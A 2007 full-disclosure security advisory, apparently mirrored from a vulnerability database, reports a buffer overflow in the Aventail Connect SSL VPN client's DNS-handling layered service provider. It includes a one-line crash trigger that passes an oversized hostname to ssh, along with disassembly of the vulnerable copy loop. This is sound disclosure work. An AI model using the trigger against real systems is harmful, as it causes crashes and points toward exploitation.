Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16912
HistoryMay 02, 2007 - 12:00 a.m.

[Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow

2007-05-0200:00:00
vulners.com
13

Hello,

Aventail Connect registers a layered service provider to handle DNS queries.
When resolving a hostname the software fails to check string boundaries
properly.
As the lsp intercepts all ws2_32 dns lookups every application performing
these operations is vulnerable.

e.g.

$ ssh $(perl -e 'print "a"x2200')
Segmentation fault (core dumped)

vulnerable copy loop in asnsp.dll:

18B539F2 41 INC ECX
18B539F3 41 INC ECX
18B539F4 66:85D2 TEST DX,DX
18B539F7 74 0A JE SHORT asnsp.18B53A03
18B539F9 66:8B11 MOV DX,WORD PTR DS:[ECX]
18B539FC 66:8916 MOV WORD PTR DS:[ESI],DX
18B539FF 46 INC ESI
18B53A00 46 INC ESI
18B53A01 ^EB EF JMP SHORT asnsp.18B539F2

This was tested on version 4.1.2.13.
vendor: http://www.aventail.com/

Regards,
Thomas Pollet